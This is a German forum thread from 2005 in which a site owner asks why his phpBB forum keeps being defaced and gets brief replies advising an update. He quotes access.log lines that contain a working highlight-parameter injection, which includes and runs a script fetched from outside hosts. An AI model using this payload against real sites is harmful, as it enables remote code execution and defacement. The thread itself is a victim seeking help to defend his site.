gs-500.de  

Zurück   gs-500.de > Fun, Offtopic, etc. > Computer, Handy, Technik, ...

Hinweise

Antwort
 
Themen-Optionen
Alt 14.12.2005, 01:22:54   #1
King Madness
Erfahrener Benutzer
 
Benutzerbild von King Madness
 
Registriert seit: 13.04.2003
Ort: 52249 Eschweiler
Alter: 60
Beiträge: 5.336
Baujahr: 1991
Kilometer: 49.000
Standard Hacker

Ich habe mal eine Frage zum Thema Hacker.

Mein Billard Forum wird seit einigen Tagen dauernd von Hackern abngegriffen (ich gehe mal davon aus, das die mir irgendwo ein Script untergejubelt haben).

Hat schon mal jemand etwas von diesen Hackern gehört : (modded by sirh0t fuck Aleks)" ???

Hat jemand eine Ahnung wie ich rausbekommen kann, wo dir mir das Script versteckt haben können ?

Ich habe schon die komplette Homepage vom Server genommen, ein Update aufgespielt (also nicht die gleichen Daten) und die Datenbank neu aufgespielt.

Langsam weiß ich keinen rat mehr.

In meiner access.log finden sich folgende Einträge :
Einträge vom 10. Dez.

Zitat:
205.234.100.65 - - [10/Dec/2005:14:39:28 +0100] "GET /forum/viewtopic.php?p=3735&highlight=%2527.$poster=inclu de($_GET[m]).%2527&
m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 17200 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t fuck Aleks)"
Einträge von heute :
Zitat:
195.225.236.162 - - [13/Dec/2005:22:16:30 +0100] "GET /forum/viewtopic.php?p=3735&highlight=%2527.$poster=inclu de($_GET[m]).%2527&m=http://makturk.com/irc/gallery/files/phpbb_private?& HTTP/1.0" 200 17340 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t and Aleks)"
Klar ist mir nur, das das Script immer das Posting 3735 mit Highlight 2527 sucht.
Die IP Adressen ändern sich alle paar Minuten.

Was mir persönlich jetzt auch nichts sagt, ist die türkische Adresse (http://www.yatas.com und http://www.matuk.com) und warum die google.ne Adresse da drin ist.
__________________
Ralf Georg
國王 瘋狂 - www.euregio-biker.de

Ein Tag an dem man nicht lächelt, ist ein verlorener Tag (Ch. Chaplin *1889 †1977)
Befürworter des Organspendeausweises
King Madness ist offline   Mit Zitat antworten
Alt 14.12.2005, 03:04:38   #2
verdi
Administrator
 
Benutzerbild von verdi
 
Registriert seit: 15.05.2002
Ort: Hamburg
Alter: 43
Beiträge: 9.038
Baujahr: 1994
Kilometer: 45000
Standard

update mal dein phpbb
__________________
When I get sad, I stop being sad and be awesome again. True story.
verdi ist offline   Mit Zitat antworten
Alt 15.12.2005, 09:05:10   #3
thel0rd
Gast
 
Beiträge: n/a
Standard

was steht denn in dem besagten Post drin? kannst du den irgendwo in der DB finden? steht da irgendwas merkwürdiges?
  Mit Zitat antworten
Alt 15.12.2005, 14:16:40   #4
King Madness
Erfahrener Benutzer
 
Benutzerbild von King Madness
 
Registriert seit: 13.04.2003
Ort: 52249 Eschweiler
Alter: 60
Beiträge: 5.336
Baujahr: 1991
Kilometer: 49.000
Standard

So, habe mal die Software aktualisiert, ein Hacker-Mod eingebaut und wieder aufgespielt, mal sehen, ob es diesmal hält.

Es waren so genannte Script Kiddies, die eine Seite von ausserhalb manipulieren.

Folgender Text war zu lesen (und ist auch nicht in der Datenbank :

Zitat:
FUCK YOU 0X1FE AND ALL PEOPLE IN UR CHANNEL FUCK BOTS, FUCK BOXTALK HOPE ALL U LAMERS GET BUSTED

SOON I OWN U ALL!!!

Credits to sirh0t and phpbb
Dazu kommt noch, das sie auf ein "nicht jugendfreies) Bild verlinken wollten (was aber durch einen Fehler nicht geschehen ist)
__________________
Ralf Georg
國王 瘋狂 - www.euregio-biker.de

Ein Tag an dem man nicht lächelt, ist ein verlorener Tag (Ch. Chaplin *1889 †1977)
Befürworter des Organspendeausweises
King Madness ist offline   Mit Zitat antworten
Antwort

Lesezeichen

Themen-Optionen

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist aus.
HTML-Code ist aus.

Gehe zu


Alle Zeitangaben in WEZ +1. Es ist jetzt 22:30:13 Uhr.


Powered by vBulletin® Version 3.8.9 (Deutsch)
Copyright ©2000 - 2025, vBulletin Solutions, Inc.